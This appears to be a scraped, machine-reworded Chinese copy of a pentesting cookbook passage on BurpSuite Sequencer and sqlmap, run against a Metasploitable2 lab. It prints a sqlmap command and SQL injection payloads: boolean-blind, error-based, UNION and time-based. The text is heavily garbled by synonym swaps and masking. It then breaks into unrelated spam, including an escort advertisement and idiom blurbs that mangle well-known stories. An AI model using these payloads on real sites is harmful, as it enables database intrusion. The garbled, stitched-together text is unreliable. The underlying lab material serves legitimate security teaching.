创作者:Justin Hutchens
译员:巨龙
协议书:CC BY-NC-SA 4.0
Web 运用会话一般 由会话 ID 标志来维护保养,它由任意或伪随机值构成。出自于这一缘故,偶然性一般 是这种运用的安全性的重要。这一秘笈中,大家会探讨怎么使用 BurpSuite Sequencer 来搜集形成的值,并测试他们的偶然性。
为了更好地应用 BurpSuite 对总体目标实行 Web 运用剖析,你需要有着运作一个或好几个 Web 运用的远程控制系统软件。所出示的事例中,大家应用 Metasploitable2 案例来达到目标。 Metasploitable2 有着多种多样预安裝的系统漏洞 Web 运用,运作在 TCP 80 端口号上。配备 Metasploitable2 的其他信息请参照之一章中的“安裝 Metasploitable2”秘笈。
除此之外,你的 Web 电脑浏览器必须配备来根据 BurpSuite 当地案例 *** 商 Web 总流量。有关将 BurpSuite 作为浏览器 *** 的其他信息,请参照之一章的“配备 BurpSuite”一节。
为了更好地应用 BurpSuite Sequencer,响应务必包括Set-Cookie协议书头,或是其他伪随机数的值,测试必须他们来推送。这能够根据HTTP *** 商历史时间或是在于电脑浏览器的响应阻拦来进行,像那样:
Burp 会全自动应用响应中的全部 Cookie 值添充 Cookie 下拉列表。做为取代,你能应用Custom location字段名,以后点一下Configure按键来特定响应中的一切部位用以测试,像那样:
在明确必须测试的值以后,点一下Start live capture按键,这会逐渐递交很多请求来得到 参数的增加值。这一事例中,Burp 会递交很多请求,并将 PHPSESSID 从请求中除去。这会造成 *** 服务器为每一个请求形成新的会话标志。这样一来,大家就可以得到 样版值,他们能够用以进行 FIPS 测试。FIPS 测试由一系列测试构成,他们会资产评估公司形成的伪随机数的熵。全部这种测试会以图型文件格式展现,使其十分通俗易懂,像那样:
针对高准确度和完全的 FIPS 测试而言,一共必须 20000 个值。可是剖析至少能够以 100 个值来实行。除开实行即时捕捉以外,Manual load标签页能够用以为测试提交或黏贴值的目录。
BurpSuite Sequencer 对伪随机数样版实行很多不一样的数学课评定,依据所生成随机数的熵试着分辨其品质。即时捕捉可用以形成样版值,它根据递交事前结构的请求,并造成 *** 服务器分派新的值。这一般 根据从请求中清除目前Cookie值,进而使响应以新的Set-Cookie协议书头的方式,出示新的会话标志来进行。
Web 运用经常接纳所出示 URL 内的参数。这种参数一般 以 HTTP GET 方式发送给 *** 服务器。假如一切这种参数接着包括在发送给后端开发数据库查询的查看句子中,SQL 引入系统漏洞就很有可能存有。大家会探讨怎么使用 sqlmap 来自动化技术 HTTP GET 方式请求参数的测试。
为了更好地应用 sqlmap 对总体目标实行 Web 运用剖析,你需要有着运作一个或好几个 Web 运用的远程控制系统软件。所出示的事例中,大家应用 Metasploitable2 案例来达到目标。 Metasploitable2 有着多种多样预安裝的系统漏洞 Web 运用,运作在 TCP 80 端口号上。配备 Metasploitable2 的其他信息请参照之一章中的“安裝 Metasploitable2”秘笈。
为了更好地应用 sqlmap 来测试 HTTP GET 方式参数,你需要应用-u参数及其要测试的 URL。这一 URL 应当包括一切 GET 方式参数。除此之外,假如 Web 內容只是根据创建的会话来方式,还必须应用--cookie出示与会话相匹配的 Cookie。
root@KaliLinux:~# sqlmap -u " sqli/?id=x&Submit=y" --cookie="security=low; PHPSESSID=bcd9bf6b6171b16f94 3cd20c1651bf8f" --risk=3 --level=5
**{CUT}**
sqlmap identified the following injection points with a total of 279 HTTP(s) requests:
--
Place: GET
Parameter: id
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-2345' OR (1644=1644) AND 'moHu'='moHu&Submit=y
Type: error-based
Title: MySQL >=5.0 AND error-based - WHERE or HAVING clause
Payload: id=x' AND (SELECT 1537 FROM(SELECT COUNT(*),CONCAT(0x3a6b6f 683a,(SELECT (CASE WHEN (1537=1537) THEN 1 ELSE 0 END)),0x3a696a793a,FLO OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VHVT'='VHVT&Submit=y
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=x' UNION ALL SELECT CONCAT(0x3a6b6f683a,0x7979634f4e716b7 55961,0x3a696a793a),NULL#&Submit=y
Type: AND/OR time-based blind
Title: MySQL
Payload: id=x' AND 5276=BENCHMARK(5000000,MD5(0x704b5772)) AND 'XiQP'='XiQP&Submit=y
--
**{TRUNCATED}** 1234567891011121314151617181920212223242512345678910111213141516171819202122232425
今天给大家分享的内容是“北京上门女小学妹在线预约【酆灿怡】”,我是酆灿怡,来自随州市,今年25岁,作为职业:北京模特伴游,我热爱我的职业:北京模特伴游。三圍:胸65腰90臀61 鞋碼:39,上海伴游陪...
“始作俑者,其无后乎”这句话一般认为是孔子说的。所谓“俑”是指中国古代丧葬中用来陪葬的偶人。 作为象征殉葬奴隶的模拟品,在东周墓中逐渐采用,秦汉至隋唐盛行,北宋以后逐渐衰落。“其”是一个语气助词,用...
“卧薪尝胆”是我国古代神话中更为知名,也是更为感人小故事之一,大家常因炎帝黄帝女儿被南海浪涛吞食化为精卫鸟而哀叹,更加精卫鸟衔运香山木石以填南海的坚强不屈执着精神实质而抛撒泪水。 后人大家也经...
本文导读目录: 1、篡改病历触犯刑法? 2、我篡改医院病历该负什么法律责任 3、请问:病历被篡改伪造,是由法院先送去鉴定机构再由鉴定机构判定病历是否能作为证据鉴定的吗? 4、病历是医院用电...
甲亢成为近些年来,越来越频繁发生的疾病了。以往甲亢病人多分布在沿海城市,但随着生活条件的提高,生活节奏的加快,甲亢越来越频繁的出现在人群中,特别是女性,每100个人中就有2个患者,患病几率比男性高5-...
手机赚钱(有没有用一部手机就可以赚钱的项目)在网上咨询小编怎么用手机赚钱的人很多,有的时候我也很想问一个问题:真的有用手机就能赚钱的项目吗?我想了想,好像看起来是有的,但是实际上应该并没有。很多我们看...